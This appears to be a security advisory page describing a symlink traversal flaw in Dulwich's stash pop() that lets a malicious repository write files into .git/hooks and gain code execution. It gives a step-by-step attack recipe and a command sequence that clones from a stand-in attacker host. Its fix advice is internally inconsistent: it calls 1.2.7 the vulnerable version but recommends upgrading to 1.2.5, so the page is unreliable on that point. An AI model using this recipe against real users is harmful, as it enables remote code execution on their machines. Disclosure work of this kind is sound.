Listen to this Post
Dulwich’s stash.py:pop() function is vulnerable to symlink directory traversal, allowing an attacker to write arbitrary files outside the repository worktree when a victim pops a stash in a malicious repository. The pop() function at dulwich/stash.py:236 uses os.path.exists(parent_dir) to check if a parent directory exists before writing stashed files. os.path.exists() follows symlinks, so when an intermediate directory in the path is a symlink pointing outside the worktree (e.g., link → ../../.git/hooks), the check passes and subsequent file writes resolve through the symlink. The validate_path() function (line 228) only validates path component names against INVALID_DOTNAMES — it performs zero filesystem symlink detection. On dulwich 1.2.7 (latest release), build_file_from_blob() has no symlink protection whatsoever. An attacker can craft a malicious repository that, when a victim clones it and performs a stash pop operation, writes attacker-controlled content to arbitrary filesystem locations. Writing to .git/hooks/post-checkout achieves Remote Code Execution on the victim’s machine on the next git checkout operation. The attack scenario involves: Attacker creates a repository with branch main containing link (symlink → ../../.git/hooks) and branch feature containing link/post-checkout (executable payload). Victim clones the repository (landing on main — symlink link exists in worktree). Victim checks out feature, makes changes, runs stash.push(). Victim checks out main (restoring the link symlink). Victim runs stash.pop(0) — stash contains link/post-checkout. os.path.exists(“link”) returns True (symlink to existing directory), os.makedirs skipped. build_file_from_blob(blob, mode, “link/post-checkout”) → open(“link/post-checkout”, “wb”) follows the intermediate symlink → payload written to .git/hooks/post-checkout. Next checkout operation triggers the hook → RCE. Suggested fix: Before writing any file, verify that no component of the target path resolves through a symlink outside the worktree. Use os.path.realpath(parent_dir) and confirm it stays within the repository root. Alternatively, use os.open() with O_NOFOLLOW on each path component. Reported by zx (Jace).
DailyCVE Form:
Platform: Dulwich
Version: 1.2.7
Vulnerability: Symlink directory traversal
Severity: High
date: 2026-05-29
Prediction: 2026-05-29
What Undercode Say:
Clone malicious repository git clone https://attacker.com/malicious-repo.git Checkout feature branch git checkout feature Make changes and stash git stash push Checkout main to restore symlink git checkout main Pop stash (triggers write through symlink) git stash pop 0
Vulnerable code in dulwich/stash.py:236
parent_dir = os.path.dirname(...)
if not os.path.exists(parent_dir):
os.makedirs(parent_dir)
build_file_from_blob(blob, mode, "link/post-checkout") open("link/post-checkout", "wb")
Exploit: (Educational Purposes!)
- Attacker creates a repository with branch main containing link (symlink → ../../.git/hooks) and branch feature containing link/post-checkout (executable payload)
- Victim clones the repository (landing on main — symlink link exists in worktree)
- Victim checks out feature, makes changes, runs stash.push()
- Victim checks out main (restoring the link symlink)
- Victim runs stash.pop(0) — stash contains link/post-checkout
- os.path.exists(“link”) returns True (symlink to existing directory), os.makedirs skipped
- build_file_from_blob(blob, mode, “link/post-checkout”) → open(“link/post-checkout”, “wb”) follows the intermediate symlink → payload written to .git/hooks/post-checkout
- Next checkout operation triggers the hook → RCE
Protection: from this CVE
- Upgrade to Dulwich 1.2.5 or later
- Use os.path.realpath(parent_dir) and confirm it stays within the repository root
- Use os.open() with O_NOFOLLOW on each path component
Impact:
- Arbitrary file write outside the repository worktree
- Remote Code Execution via .git/hooks/post-checkout on the next git checkout operation
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

